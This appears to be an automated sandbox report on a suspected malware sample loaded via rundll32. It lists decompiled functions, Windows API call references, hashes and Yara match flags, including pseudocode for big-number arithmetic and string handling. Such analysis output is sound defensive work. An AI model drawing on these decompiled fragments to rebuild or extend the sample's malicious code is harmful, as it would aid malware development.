                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 05B74E5C
                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 05B74E72
                          • memset.NTDLL ref: 05B74F1B
                          • memset.NTDLL ref: 05B74F31
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset$_allmul_aulldiv
                          • String ID:
                          • API String ID: 3041852380-0
                          • Opcode ID: 879862c278153baa01bb6063999e50934399c6c9eae736a93c32b5eb3803fe54
                          • Instruction ID: 4abc3a6ccdcf6f177ca50502442485b4d5f062a94664203970fec7fc90582876
                          • Opcode Fuzzy Hash: 879862c278153baa01bb6063999e50934399c6c9eae736a93c32b5eb3803fe54
                          • Instruction Fuzzy Hash: 31417F31B00219AFDF149E68DC85FEE77A9EF45720F0045A9F82AA7280DB70BE45CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001DE3 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E01001DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E01002FAB(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E01001CC1(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01002920(_t101,  &_v428, _a8, _t96 - _t81);
					E01002920(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E01001CC1(_t101,  &E0100A1D0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E01001CC1(_a16, _a4);
						E01003ADA(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0100824A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L01008244();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0100241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E01002378(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E010079CC(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0100A1D0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                          0x01001de6
                          0x01001df2
                          0x01001df8
                          0x01001dfd
                          0x01001e01
                          0x01001f73
                          0x01001f77
                          0x01001f77
                          0x01001e07
                          0x01001e0b
                          0x01001e0f
                          0x01001e12
                          0x01001e1d
                          0x01001e23
                          0x01001e28
                          0x01001e2b
                          0x01001e45
                          0x01001e54
                          0x01001e60
                          0x01001e6a
                          0x01001e6f
                          0x01001e71
                          0x01001e74
                          0x01001f2b
                          0x01001f31
                          0x01001f42
                          0x01001f55
                          0x01001f6b
                          0x00000000
                          0x01001f70
                          0x01001e7d
                          0x01001e84
                          0x01001e88
                          0x01001e8e
                          0x01001e90
                          0x01001e92
                          0x01001e94
                          0x01001e96
                          0x01001ea0
                          0x01001ea5
                          0x01001ea7
                          0x01001ea9
                          0x01001eaa
                          0x01001eab
                          0x01001eac
                          0x01001eb3
                          0x01001eba
                          0x01001ebd
                          0x01001ebd
                          0x01001e8a
                          0x01001e8a
                          0x01001e8a
                          0x01001ec5
                          0x01001ecd
                          0x01001ed9
                          0x01001ede
                          0x01001ede
                          0x01001ee3
                          0x00000000
                          0x00000000
                          0x01001ee5
                          0x01001ee8
                          0x01001ef5
                          0x00000000
                          0x00000000
                          0x01001ef7
                          0x01001ef7
                          0x01001f04
                          0x01001ede
                          0x01001ee3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001ee3
                          0x01001f0e
                          0x01001f11
                          0x01001f14
                          0x01001f1b
                          0x01001f1b
                          0x01001f28
                          0x00000000
                          0x01001f28
                          0x01001e14
                          0x01001e18
                          0x01001e19
                          0x01001e1b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001e1b
                          0x00000000

                          APIs
                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01001E96
                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01001EAC
                          • memset.NTDLL ref: 01001F55
                          • memset.NTDLL ref: 01001F6B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memset$_allmul_aulldiv
                          • String ID:
                          • API String ID: 3041852380-0
                          • Opcode ID: caadb6f63e326d1585d913fc1e69a9f5938a7f8640ccab45838db247d9bde560
                          • Instruction ID: 9186aee12246aa995e567f2b5f2a5d85dae55796115aef9acb80dcaf1b71d18f
                          • Opcode Fuzzy Hash: caadb6f63e326d1585d913fc1e69a9f5938a7f8640ccab45838db247d9bde560
                          • Instruction Fuzzy Hash: A141B031A0021AAFEF129F68DC84BEE77B4EF55310F004169F999972C0DB70EE548B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6F5ED Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          APIs
                          • ResetEvent.KERNEL32(?,00000000,00000000,00000000,05B63EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7C7D5
                          • GetLastError.KERNEL32(?,?,?,05B63EC6,?,?), ref: 05B7C7EE
                          • ResetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7C867
                          • GetLastError.KERNEL32(?,?,?,05B63EC6,?,?), ref: 05B7C882
                            • Part of subcall function 05B7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7EC20
                            • Part of subcall function 05B7EC09: SetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7EC30
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                          • String ID:
                          • API String ID: 1123145548-0
                          • Opcode ID: db254654ea140f772cd9abb01319530aeaa6f3f5c2e1972313f11712a013ea90
                          • Instruction ID: 33acf0b28c9b0c1d2da26b977ae89b1ed5c3515e9f261c4d2cd7ac664c0955c5
                          • Opcode Fuzzy Hash: db254654ea140f772cd9abb01319530aeaa6f3f5c2e1972313f11712a013ea90
                          • Instruction Fuzzy Hash: FF418732640608AFDB219BA4DC44EBE7BBAFF88260F1445A9E526D7190EB70FD41DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B79A79 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 05B79A93
                          • StrChrA.SHLWAPI(?,0000005C), ref: 05B79ABA
                          • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 05B79AE0
                          • lstrcpy.KERNEL32(?,?), ref: 05B79B84
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrcpyn
                          • String ID:
                          • API String ID: 4154805583-0
                          • Opcode ID: 995712dbd32c6e54c2fed520fc6bd36619fffff566ff46b32a726089619befed
                          • Instruction ID: 6c9a6cbb2b5ab8166a668746ba0c0f7565a756216714257900dc8425677cb40e
                          • Opcode Fuzzy Hash: 995712dbd32c6e54c2fed520fc6bd36619fffff566ff46b32a726089619befed
                          • Instruction Fuzzy Hash: 47411AB6910119BFDB12DBA4CD88DEE7BBDFB09250F0445A6F915E7140DA34AA48CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B79185 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strupr
                          • String ID:
                          • API String ID: 3408778250-0
                          • Opcode ID: e37ed19dce8e2714aef6bdc903c97eeb8f8e9d9f34bfac20a75129458cabd5af
                          • Instruction ID: e57130f23783318fd6b99e9bd5b2f958337de89e36f4e3b5c45f85d7e4faa80d
                          • Opcode Fuzzy Hash: e37ed19dce8e2714aef6bdc903c97eeb8f8e9d9f34bfac20a75129458cabd5af
                          • Instruction Fuzzy Hash: 0A412E7290020D9ADF25EF68D888AFEB7F9FF44240F119455F825D6120E734F459CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B64858 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 05B69D54
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B648C0
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B64911
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05B64946
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05B64956
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                          • String ID:
                          • API String ID: 4200334623-0
                          • Opcode ID: bbc24cd67998fc16c91c65b49059a1d2880ba2b0fff456c7c4c57e18fbc321a4
                          • Instruction ID: a00fb2c43428209cd80d531e7b8aa49eec667c0b0001b1c7e4f143037f8e8f3a
                          • Opcode Fuzzy Hash: bbc24cd67998fc16c91c65b49059a1d2880ba2b0fff456c7c4c57e18fbc321a4
                          • Instruction Fuzzy Hash: 8E311576610019BFDB109FA4DC89CBABBAEFB08250B1104A5F605E7150DB71BE54EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7EC09 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7EC20
                          • SetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7EC30
                          • GetLastError.KERNEL32 ref: 05B7ECB9
                            • Part of subcall function 05B7F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05B82F4B,0000EA60,?,?,?,05B7DD27,00000000,0000EA60,00000000), ref: 05B7F1B2
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • GetLastError.KERNEL32(00000000), ref: 05B7ECEE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                          • String ID:
                          • API String ID: 602384898-0
                          • Opcode ID: d6f56f2200c5649dbe16f57e58c741e18727bc25a326e8284e4c1802c35a1608
                          • Instruction ID: f2fed398d8a45ace722b150fd5e7a05ee467b68c4a4a4c54542e9e475bd9ac32
                          • Opcode Fuzzy Hash: d6f56f2200c5649dbe16f57e58c741e18727bc25a326e8284e4c1802c35a1608
                          • Instruction Fuzzy Hash: 6E31EBB590020DFFDB20DFB5C8859AEBBBDFF08204F1449EAE512A2250D631FA44DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7A868 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B7A8C1
                          • memcpy.NTDLL(00000018,?,?), ref: 05B7A8EA
                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 05B7A929
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7A93C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                          • String ID:
                          • API String ID: 2780211928-0
                          • Opcode ID: 2c307575b7257dd2cb6efb2889ba80880e1c687d61b7a8b019a64f09c19912ff
                          • Instruction ID: 180e6d0db3c365b43a072137dfb60f6e1b211ea8c4804952567ab63c6587e4f2
                          • Opcode Fuzzy Hash: 2c307575b7257dd2cb6efb2889ba80880e1c687d61b7a8b019a64f09c19912ff
                          • Instruction Fuzzy Hash: A3315C70200209AFDB209F24DC45EAE7FAAFF05720F104519F966D7290DB70F915DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74B99 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 05B74BC8
                          • SetEvent.KERNEL32(?), ref: 05B74C12
                          • TlsSetValue.KERNEL32(00000001), ref: 05B74C4C
                          • TlsSetValue.KERNEL32(00000000), ref: 05B74C68
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$Event
                          • String ID:
                          • API String ID: 3803239005-0
                          • Opcode ID: b8e55cce427e5870e3778c2591f106ee5a73a2353734e78ca6531181de5d444f
                          • Instruction ID: 895e834e65c6fcb6e5b500a8db0a3d76e6b92d47381738bf72e51a9ff010bd78
                          • Opcode Fuzzy Hash: b8e55cce427e5870e3778c2591f106ee5a73a2353734e78ca6531181de5d444f
                          • Instruction Fuzzy Hash: 4B21AE31200348AFCF21AF68DD869AA7FA2FF41B22B605469F422CB1A0D771FC51DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7F09D Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,05B63EC6), ref: 05B75540
                            • Part of subcall function 05B7550A: memset.NTDLL ref: 05B755B6
                            • Part of subcall function 05B7550A: memset.NTDLL ref: 05B755CA
                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 05B7F0F5
                          • lstrcmpi.KERNEL32(00000000,?), ref: 05B7F11C
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05B7F161
                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 05B7F172
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                          • String ID:
                          • API String ID: 1065503980-0
                          • Opcode ID: 7ddb4d744d19ad9bebca2d6033cc095266b4f5efce53ce2cfa40f2d2d4d37746
                          • Instruction ID: 5ec9655fe23a55875271c40779b911d19151fcab718b17d8188d70ad36233445
                          • Opcode Fuzzy Hash: 7ddb4d744d19ad9bebca2d6033cc095266b4f5efce53ce2cfa40f2d2d4d37746
                          • Instruction Fuzzy Hash: 27213931A10209BFDF21AFA4DC89EBE7BBAEB04254F1050A1F925A7150DB34B959DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E0C4 Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B7E0F3
                          • lstrlen.KERNEL32(00000000), ref: 05B7E104
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • strcpy.NTDLL ref: 05B7E11B
                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 05B7E125
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                          • String ID:
                          • API String ID: 528014985-0
                          • Opcode ID: 6d6c2d33b07c48461acf782015b3acd54083e603f3799abe77abef85993115b6
                          • Instruction ID: 4cc41e708bdbe0199339539e0546c9bcb4980320969264d28d824746d7b01815
                          • Opcode Fuzzy Hash: 6d6c2d33b07c48461acf782015b3acd54083e603f3799abe77abef85993115b6
                          • Instruction Fuzzy Hash: E7216075104305AFEB209B74D84AB3A7BEDFF44712F108499F9669B681EF75E404C611
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100264F Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E0100264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E01006D63(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                          0x0100265b
                          0x0100265f
                          0x01002660
                          0x01002661
                          0x01002663
                          0x01002665
                          0x01002668
                          0x0100266d
                          0x01002704
                          0x0100270b
                          0x0100270b
                          0x01002676
                          0x0100267d
                          0x0100268d
                          0x0100268d
                          0x01002693
                          0x01002695
                          0x0100269a
                          0x010026a3
                          0x010026a9
                          0x010026ae
                          0x010026b9
                          0x010026bd
                          0x010026bf
                          0x010026c0
                          0x010026c9
                          0x010026cd
                          0x010026de
                          0x010026cf
                          0x010026d4
                          0x010026d9
                          0x010026e8
                          0x010026e8
                          0x010026bd
                          0x010026ee
                          0x010026f4
                          0x010026f4
                          0x010026fd
                          0x01002702
                          0x01002702
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeSleepStringlstrlenmemcpy
                          • String ID:
                          • API String ID: 1198164300-0
                          • Opcode ID: e44f7739435e353f2baeafd4139d9a15f2ce7822a46b5e68b3e067b0ce48b17f
                          • Instruction ID: ddbd01f660e03f49a870ef0782e4a577adcedf55084d91f7cdda65ca4cef6c9b
                          • Opcode Fuzzy Hash: e44f7739435e353f2baeafd4139d9a15f2ce7822a46b5e68b3e067b0ce48b17f
                          • Instruction Fuzzy Hash: BE21447590120AEFEB12DFA8C9889DEBBF5FF48214F1041A9E985E7250EB31DA44CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B62F91 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B62FB3
                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 05B62FF7
                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 05B6303A
                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05B6305D
                            • Part of subcall function 05B7B9E9: GetTickCount.KERNEL32 ref: 05B7B9F9
                            • Part of subcall function 05B7B9E9: CreateFileW.KERNEL32(05B70971,80000000,00000003,05B8A1E8,00000003,00000000,00000000,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA16
                            • Part of subcall function 05B7B9E9: GetFileSize.KERNEL32(05B70971,00000000,?,00000001,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA49
                            • Part of subcall function 05B7B9E9: CreateFileMappingA.KERNEL32(05B70971,05B8A1E8,00000002,00000000,00000000,05B70971), ref: 05B7BA5D
                            • Part of subcall function 05B7B9E9: lstrlen.KERNEL32(05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA79
                            • Part of subcall function 05B7B9E9: lstrcpy.KERNEL32(?,05B70971), ref: 05B7BA89
                            • Part of subcall function 05B7B9E9: HeapFree.KERNEL32(00000000,05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BAA4
                            • Part of subcall function 05B7B9E9: CloseHandle.KERNEL32(05B70971,?,00000001,?,05B70971), ref: 05B7BAB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                          • String ID:
                          • API String ID: 3239194699-0
                          • Opcode ID: 1f4b54b0595532fc01b6261a31eb3904af3a383dffc01e68aeff15bfa8ae4875
                          • Instruction ID: f30e734a939a30fedc461258a0ae2b85608b6a0adf4e64a425dcf6bece6820ad
                          • Opcode Fuzzy Hash: 1f4b54b0595532fc01b6261a31eb3904af3a383dffc01e68aeff15bfa8ae4875
                          • Instruction Fuzzy Hash: FA214831500208EADF21DF65DD48EEEBBB9FF44360F140565F925931A0E734A559CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B82968 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B8297E
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B82999
                          • GetLastError.KERNEL32 ref: 05B82A07
                          • GetLastError.KERNEL32 ref: 05B82A16
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalErrorLastSection$EnterLeave
                          • String ID:
                          • API String ID: 2124651672-0
                          • Opcode ID: 981e90901837f612a3d01fa06699f6311cb101dbe80b499e8cd98fea28d03c11
                          • Instruction ID: be4025ca87f0a5a979c9b76747fc6b35f4d1a1db3f45e84daeed450cc11c26d1
                          • Opcode Fuzzy Hash: 981e90901837f612a3d01fa06699f6311cb101dbe80b499e8cd98fea28d03c11
                          • Instruction Fuzzy Hash: 7F213B36900609EFCB22DF94D945AAEBBB9FF48720F115199F816A3250CB34FA11DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B67D47 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05B67D5E), ref: 05B6A6BE
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05B67D99
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,05B6C556,?), ref: 05B67DAB
                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,05B6C556,?), ref: 05B67DC3
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,05B6C556,?), ref: 05B67DDE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
